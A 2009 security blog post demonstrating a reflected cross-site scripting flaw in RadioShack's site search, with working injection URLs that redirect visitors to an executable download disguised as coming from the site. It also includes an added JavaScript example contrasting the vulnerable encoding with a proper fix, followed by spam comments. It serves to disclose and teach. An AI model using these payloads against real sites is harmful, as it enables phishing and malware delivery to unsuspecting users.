This site is soon to be deprecated by http://www.johnleitch.net

Tuesday, May 5, 2009

Insecure JavaScript - RadioShack.com

Today we're going to examine www.radioshack.com. As with many XSS exploits, this will be short and simple. Looking at the site, you'll notice it has a product search. Just as before, we'll test it with our special string, testA.,:;\'"<>()[]{} , which covers the characters most likely to be filtered or encoded.



Without viewing the source it's apparent that our test string has been significantly altered: ,:;\'"<>()[]{} has been completely removed from our search. But how much of this happened client-side, in the browser before the form was submitted, rather than on the server? Let's take a look at the current URL.
http://www.radioshack.com/search/noResults.jsp?useCatForBc=1&bcLinkAll=1&sr=1&kw=testa.&origkw=testA.,:;\'%26quot;%26lt;%26gt;()[]{}&kwCatId=


By putting our original search string back into the kw parameter, we can build our own URL and see how much the site relies on client-side validation. Our new URL should look like this:
http://www.radioshack.com/search/noResults.jsp?useCatForBc=1&bcLinkAll=1&sr=1&kw=testA.,:;\'"<>()[]{}&origkw=testA.,:;\'%26quot;%26lt;%26gt;()[]{}&kwCatId=




Things certainly look better, but it's still possible the search is secure. To find out, we'll have to view the source of the page. Looking at the first match for testA, it's apparent that our search string has been HTML-encoded before being placed in the attribute value.


<input type="text" style="font-size:10px;width:164px;" name="kw" id="kw" value="testA.,:;\'&quot;&lt;&gt;()[]{}">

This complicates things, but an attack is still possible. The encoding only turns ", < and > into entities; the single quote and backslash pass through untouched. Let's look at some of the other results. Near the bottom of the page is the following block of JavaScript:

var s_account='gsicrsk';
var s_server='www.radioshack.com';
var s_hier1='';
var s_eVar19='67340647933';
var s_channel='Home';
var s_eVar3='testA.,:;\'&quot;&lt;&gt;()[]{}';
var s_pageName='Search (internal)';

Here the same HTML-encoded value is dropped into a single-quoted JavaScript string literal, and the browser does not decode entities inside a script block. Because the single quote survives, we can close the string and inject code. Consider what would happen if we passed in ';var x=' as the keyword.

var s_account='gsicrsk';
var s_server='www.radioshack.com';
var s_hier1='';
var s_eVar19='67340647933';
var s_channel='Home';
var s_eVar3='';var x='';
var s_pageName='Search (internal)';

At this point we can write any JavaScript we want between the ; and the var x, provided we don't use any of the encoded characters (", < or >). As an example of what can be done with this, we can craft a URL that redirects to a download, making it seem as if it's coming from www.radioshack.com.
http://www.radioshack.com/search/noResults.jsp?kw=';window.location='http://download.winzip.com/wzd/winzip120.exe';var x='




As in the earlier posts, we can also URL-encode the entire payload:

http://www.radioshack.com/search/noResults.jsp?kw=%27%3B%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%3D%27%68%74%74%70%3A%2F%2F%64%6F%77%6E%6C%6F%61%64%2E%77%69%6E%7A%69%70%2E%63%6F%6D%2F%77%7A%64%2F%77%69%6E%7A%69%70%31%32%30%2E%65%78%65%27%3B%76%61%72%20%78%3D%27
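The following is an added example, not code from the original post or from radioshack.com. It models what the s_eVar3 line appears to have been doing (HTML-entity encoding, then interpolation into a JavaScript string literal), shows the encoder that actually fits that context, runs both outputs against a stand-in window object so the effect of the injected statements is visible without a browser, and reproduces the every-byte percent encoding used for the final URL. The function names, template text and fake window are assumptions for illustration.

```javascript
// Added example, not the site's code. Models the vulnerable s_eVar3 line,
// a hardened replacement, and the percent encoding from the post's last URL.

// Probe string from the post.
const TEST_STRING = 'testA.,:;\\\'"<>()[]{}';

// Payload from the post: closes s_eVar3, redirects, reopens a string literal.
const PAYLOAD =
  "';window.location='http://download.winzip.com/wzd/winzip120.exe';var x='";

// The encoding the site appears to have applied: HTML entities for & " < >.
// Single quote and backslash are left alone, which is all the attack needs.
function htmlEncode(s) {
  return s
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Vulnerable rendering (assumed template): HTML encoding is the wrong encoder
// for a <script> string literal. Entities are not decoded inside <script>,
// and ' is not encoded at all.
function vulnerableScript(kw) {
  return (
    "var s_channel='Home';\n" +
    "var s_eVar3='" + htmlEncode(kw) + "';\n" +
    "var s_pageName='Search (internal)';"
  );
}

// Hardened rendering: emit a real JavaScript string literal. JSON.stringify
// escapes quotes, backslashes and control characters; the extra replacements
// stop "</script>", "<!--" and "&" from ever reaching the HTML parser literally.
function jsStringLiteral(s) {
  return JSON.stringify(s)
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026');
}

function safeScript(kw) {
  return (
    "var s_channel='Home';\n" +
    'var s_eVar3=' + jsStringLiteral(kw) + ';\n' +
    "var s_pageName='Search (internal)';"
  );
}

// Execute a generated script with a fake window, so the injected
// window.location assignment and the stray "var x" can be observed.
function execute(script) {
  const fakeWindow = { location: 'http://www.radioshack.com/search/noResults.jsp' };
  const fn = new Function(
    'window',
    script + '\nreturn { s_eVar3: s_eVar3, xDefined: typeof x !== "undefined" };'
  );
  const out = fn(fakeWindow);
  out.location = fakeWindow.location;
  return out;
}

// Percent-encode every byte with uppercase hex, as the post's final URL does
// (encodeURIComponent would leave letters, digits and most punctuation as-is).
function percentEncodeAll(s) {
  return Array.from(new TextEncoder().encode(s), (b) =>
    '%' + b.toString(16).toUpperCase().padStart(2, '0')
  ).join('');
}

// kw value copied from the URL-encoded URL in the post, for comparison.
const ENCODED_KW_FROM_POST =
  '%27%3B%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%3D%27%68%74%74%70%3A%2F%2F' +
  '%64%6F%77%6E%6C%6F%61%64%2E%77%69%6E%7A%69%70%2E%63%6F%6D%2F%77%7A%64%2F%77%69' +
  '%6E%7A%69%70%31%32%30%2E%65%78%65%27%3B%76%61%72%20%78%3D%27';

function encodingMatchesPost() {
  return percentEncodeAll(PAYLOAD) === ENCODED_KW_FROM_POST &&
    decodeURIComponent(ENCODED_KW_FROM_POST) === PAYLOAD;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(vulnerableScript(PAYLOAD));
  console.log(execute(vulnerableScript(PAYLOAD)));
  console.log(execute(safeScript(PAYLOAD)));
  console.log(encodingMatchesPost());
}
```

Running it shows the vulnerable output setting the fake window's location to the WinZip URL and leaving an extra `x` variable behind, while the hardened output stores the whole payload as an inert string. The lesson is that the encoder must match the sink: HTML entity encoding is right for the `value="..."` attribute, but a value placed inside a script block needs JavaScript string escaping (or, better, should be passed through a data attribute or a JSON blob in a `<script type="application/json">` element and read from there).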

5 comments:

  1. A searchable online catalog of the popular electronics store, Radio Shack. Consumers can purchase everything from computers to digital photo frames or gift cards. Products are divided into ten categories, each having several subcategories.

    norton promo bike shop melbourne

  2. Secure Bytes business philosophy is to provide a single console from which an organization can cater to their security concerns and resolve Information Security issues proactively. We are result oriented rather than task oriented, with focus on cost minimization and productivity, which we attain through preserving our human assets and comprehensive and innovative solutions.

    it security
    increase youtube views

  3. Good article. I really think what you said is right. In modern society we have so many troubles; if you feel nothing to relax yourself, I suggest you to play the wow and some other games, and you can come to my page to find more information about http://www.mmolive.com/ and http://www.mmohome.com/gold/Guild-Wars-2-US.html/

  4. buy diablo 3 gold

    Things certainly look better, but it's still possible the search is secure. To find out, we'll have to view the source of the page. It is useful~